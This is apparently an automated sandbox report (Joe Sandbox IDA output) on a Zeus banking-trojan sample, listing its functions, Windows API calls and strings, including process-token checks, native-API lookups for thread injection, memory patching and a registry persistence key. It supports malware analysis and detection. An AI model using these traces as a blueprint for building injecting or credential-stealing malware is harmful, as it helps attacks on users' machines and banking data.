Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C6F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 003C6FB1

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

PathFindFileNameW.SHLWAPI(?), ref: 003C6FD3

Part of subcall function 003C353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,003C4232,00000000,00000000,00000000,003C3597,00000000,00000000,00000000,?,00000000), ref: 003C3555

Strings

cab, xrefs: 003C6FA6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 00416AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
Part of subcall function 00416AAA: GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9
Part of subcall function 00416AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C9FB,00000000,?,?,?), ref: 0041C8C6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00414CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 00414CEE
Part of subcall function 00414CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00414D0D
Part of subcall function 00414CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00414D19
Part of subcall function 00414CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,0041C8F5,00000000,00000000,00000000,0041C8F5,0041C8F5,00000000,?,?,?,00000000,00000044), ref: 00414D8A
Part of subcall function 00414CDD: CloseHandle.KERNEL32(?), ref: 00414D9D
Part of subcall function 00414CDD: CloseHandle.KERNEL32(?), ref: 00414DA2
Part of subcall function 00414CDD: FreeLibrary.KERNEL32(?), ref: 00414DB9

CloseHandle.KERNEL32(?), ref: 0041C907

Strings

"%s", xrefs: 0041C8DA

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CC8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 003C6AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,003C49F4,?,?,?,003C2326,000000FF,003D2C08), ref: 003C6AC3
Part of subcall function 003C6AAA: GetLastError.KERNEL32(?,?,003C49F4,?,?,?,003C2326,000000FF,003D2C08,?,?,00000000), ref: 003C6AC9
Part of subcall function 003C6AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,003C49F4,?,?,?,003C2326,000000FF,003D2C08), ref: 003C6AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,003CC9FB,00000000,?,?,?), ref: 003CC8C6

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C4CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 003C4CEE
Part of subcall function 003C4CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 003C4D0D
Part of subcall function 003C4CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 003C4D19
Part of subcall function 003C4CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,003CC8F5,00000000,00000000,00000000,003CC8F5,003CC8F5,00000000,?,?,?,00000000,00000044), ref: 003C4D8A
Part of subcall function 003C4CDD: CloseHandle.KERNEL32(?), ref: 003C4D9D
Part of subcall function 003C4CDD: CloseHandle.KERNEL32(?), ref: 003C4DA2
Part of subcall function 003C4CDD: FreeLibrary.KERNEL32(?), ref: 003C4DB9

CloseHandle.KERNEL32(?), ref: 003CC907

Strings

"%s", xrefs: 003CC8DA

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C0397, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41

APIs

getpeername.WS2_32(000000FF,00000000,00000000), ref: 003C03BB
getsockname.WS2_32(000000FF,00000000,00000000), ref: 003C03CA

Part of subcall function 003C63E5: #19.WS2_32(00000000,00000000,00000000,00000000,003BEF4E,?,00000000,00000004,?,00000000,00000000,00000000,?,00000000), ref: 003C63F3

Strings

<M;, xrefs: 003C0397

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00415484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 00415403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00415414
Part of subcall function 00415403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00415427
Part of subcall function 00415403: FreeLibrary.KERNEL32(?), ref: 00415479

GetTickCount.KERNEL32(?), ref: 004154C9

Part of subcall function 004152D1: WaitForSingleObject.KERNEL32(?,?), ref: 00415325
Part of subcall function 004152D1: Sleep.KERNEL32(?,?,?,00000000), ref: 00415338
Part of subcall function 004152D1: InternetCloseHandle.WININET(00000000), ref: 004153BE

GetTickCount.KERNEL32(00000000), ref: 004154DB

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

http://www.google.com/webhp, xrefs: 004154A9

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B971, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B9AE

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

GetCurrentThreadId.KERNEL32 ref: 0040B9A4

Strings

h(B, xrefs: 0040B994

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C5484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 003C5403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 003C5414
Part of subcall function 003C5403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 003C5427
Part of subcall function 003C5403: FreeLibrary.KERNEL32(?), ref: 003C5479

GetTickCount.KERNEL32(?), ref: 003C54C9

Part of subcall function 003C52D1: WaitForSingleObject.KERNEL32(?,?), ref: 003C5325
Part of subcall function 003C52D1: Sleep.KERNEL32(?,?,?,00000000), ref: 003C5338
Part of subcall function 003C52D1: InternetCloseHandle.WININET(00000000), ref: 003C53BE

GetTickCount.KERNEL32(00000000), ref: 003C54DB

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

http://www.google.com/webhp, xrefs: 003C54A9

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041786B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37

APIs

Part of subcall function 0041773A: CharUpperW.USER32(00000000), ref: 0041785B

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

PathAddExtensionW.SHLWAPI(00000000,00000000), ref: 004178AC
GetFileAttributesW.KERNEL32(00000000,00000000,00000006,00000000,?,.exe), ref: 004178B9

Strings

.exe, xrefs: 00417874

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040BA1B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetCurrentThreadId.KERNEL32 ref: 0040BA2D
IsWindow.USER32(?), ref: 0040BA4C

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Strings

h(B, xrefs: 0040BA5C

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B9CB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GetCurrentThreadId.KERNEL32 ref: 0040B9DC
SetLastError.KERNEL32(00000005), ref: 0040BA0B

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Strings

h(B, xrefs: 0040B9F9

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C672E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18

APIs

Part of subcall function 003C666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 003C66EA
Part of subcall function 003C666B: WSASetLastError.WS2_32(0000274C), ref: 003C66F9

accept.WS2_32(00000000,00000000,00000001), ref: 003C6754

Strings

<M;, xrefs: 003C672E
K2w, xrefs: 003C6754

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 004185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
Part of subcall function 004185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
Part of subcall function 004185D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
Part of subcall function 004185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
Part of subcall function 004185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
Part of subcall function 004185D0: CloseHandle.KERNEL32(?), ref: 0041866B

StrStrIA.SHLWAPI(?,?), ref: 0040A410
StrStrIA.SHLWAPI(?,?), ref: 0040A422
StrStrIA.SHLWAPI(?,?), ref: 0040A432
StrStrIA.SHLWAPI(?,?), ref: 0040A444

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00418678: VirtualFree.KERNEL32(0041CA1A,00000000,00008000,00000000,0041C83B,0041CA1A,?,000001E6,0000FFFF,00000001,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 00418689
Part of subcall function 00418678: CloseHandle.KERNEL32(00000B8C), ref: 00418697

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BA2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

Part of subcall function 003C85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 003C85F5
Part of subcall function 003C85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8608
Part of subcall function 003C85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8630
Part of subcall function 003C85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 003C8648
Part of subcall function 003C85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8662
Part of subcall function 003C85D0: CloseHandle.KERNEL32(?), ref: 003C866B

StrStrIA.SHLWAPI(?,?), ref: 003BA410
StrStrIA.SHLWAPI(?,?), ref: 003BA422
StrStrIA.SHLWAPI(?,?), ref: 003BA432
StrStrIA.SHLWAPI(?,?), ref: 003BA444

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,003CC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 003C8689
Part of subcall function 003C8678: CloseHandle.KERNEL32(?), ref: 003C8697

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CAD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD7C

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD9D
EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,?,003CB052,?), ref: 003CADAE

Part of subcall function 003C3346: HeapAlloc.KERNEL32(00000008,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?,?), ref: 003C3368
Part of subcall function 003C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,003C36F5,?,?,00000000,003C41E1,?,?,?,?,?,003C4191,?,?), ref: 003C3379

LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAE47

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Analysis Process: madog.exe PID: 3700 Parent PID: 3684

Executed Functions

Function 004120C4, Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412105
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 004121DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 004121FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0041220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0041221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00412230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00412242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00412254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0041228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0041229C
InitializeCriticalSection.KERNEL32(0042400C,?,?,00000000), ref: 004122C9
WSAStartup.WS2_32(00000202,?), ref: 004122DF
CreateEventW.KERNEL32(00422C30,00000001,00000000,00000000,?,?,00000000), ref: 00412300

Part of subcall function 004149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2
Part of subcall function 004149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E
Part of subcall function 004149D2: CloseHandle.KERNEL32(?), ref: 00414A23

GetLengthSid.ADVAPI32(00000000,000000FF,00422C08,?,?,00000000), ref: 00412335

Part of subcall function 00411E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00411E4B
Part of subcall function 00411E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00411E5A
Part of subcall function 00411E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00411E6E

GetCurrentProcessId.KERNEL32(00000000,0123F7D0,00000000,?,?,00000000), ref: 00412362

Part of subcall function 00411E8F: IsBadReadPtr.KERNEL32(?,?), ref: 00411EBD

Part of subcall function 00417A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(00423FB4,00000000,76C61857,00000000), ref: 00411FAF
Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(00422AC8), ref: 00411FE4
Part of subcall function 00411F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041200C
Part of subcall function 00411F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412029
Part of subcall function 00411F98: CloseHandle.KERNEL32(00000000), ref: 0041203A
Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(004223AC), ref: 00412081
Part of subcall function 00411F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412093
Part of subcall function 00411F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 0041209E

Part of subcall function 00411EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00411F2C
Part of subcall function 00411EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 00411F56

Strings

RtlUserThreadStart, xrefs: 00412220
NtQueryInformationProcess, xrefs: 0041220E
LdrGetDllHandle, xrefs: 00412244
GetProcAddress, xrefs: 0041211D
LoadLibraryA, xrefs: 00412127
LdrLoadDll, xrefs: 00412232
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 004123AB
NtCreateUserProcess, xrefs: 004121FC
SOFTWARE\Microsoft\Xyuxy, xrefs: 004123F9
NtCreateThread, xrefs: 004121F4

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00412D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 004185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
Part of subcall function 004185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
Part of subcall function 004185D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
Part of subcall function 004185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
Part of subcall function 004185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
Part of subcall function 004185D0: CloseHandle.KERNEL32(?), ref: 0041866B

Part of subcall function 00418678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0041C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00418689
Part of subcall function 00418678: CloseHandle.KERNEL32(?), ref: 00418697

CreateMutexW.KERNELBASE(00422C30,00000001,?,32901130,?,00000001,?), ref: 00412D91
GetLastError.KERNEL32 ref: 00412DA3
CloseHandle.KERNEL32(000001E6), ref: 00412DBA

Part of subcall function 0040E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0040E8E0

Part of subcall function 004131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Part of subcall function 004131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00413216
Part of subcall function 004131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
Part of subcall function 004131CC: CloseHandle.KERNEL32(00000000), ref: 0041328E
Part of subcall function 004131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1
Part of subcall function 004131CC: CloseHandle.KERNEL32(?), ref: 0041330E
Part of subcall function 004131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
Part of subcall function 004131CC: CloseHandle.KERNEL32(000001E6), ref: 0041332B

ExitWindowsEx.USER32(00000014,80000000), ref: 00412DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00412E1C
SetEvent.KERNEL32(00000000), ref: 00412E29
CloseHandle.KERNEL32(00000000), ref: 00412E30

Part of subcall function 00412A32: CloseHandle.KERNEL32(00422AF0), ref: 00412AF2

CloseHandle.KERNEL32(000001E6), ref: 00412E42
ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00412EA6
Sleep.KERNEL32(000001F4), ref: 00412EB8
IsWellKnownSid.ADVAPI32(0123F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00412EC9
ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000000,00000001,00000000), ref: 00412EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00412F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00412F50

Part of subcall function 004197D0: VirtualProtect.KERNEL32(0041CA1A,?,00000040,00000000,76C55F4D,?,?,00412F6C,?,?), ref: 004197E5
Part of subcall function 004197D0: VirtualProtect.KERNEL32(0041CA1A,?,00000000,00000000,?,?,00412F6C,?,?), ref: 00419818

CreateEventW.KERNEL32(00422C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00412FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412FE7
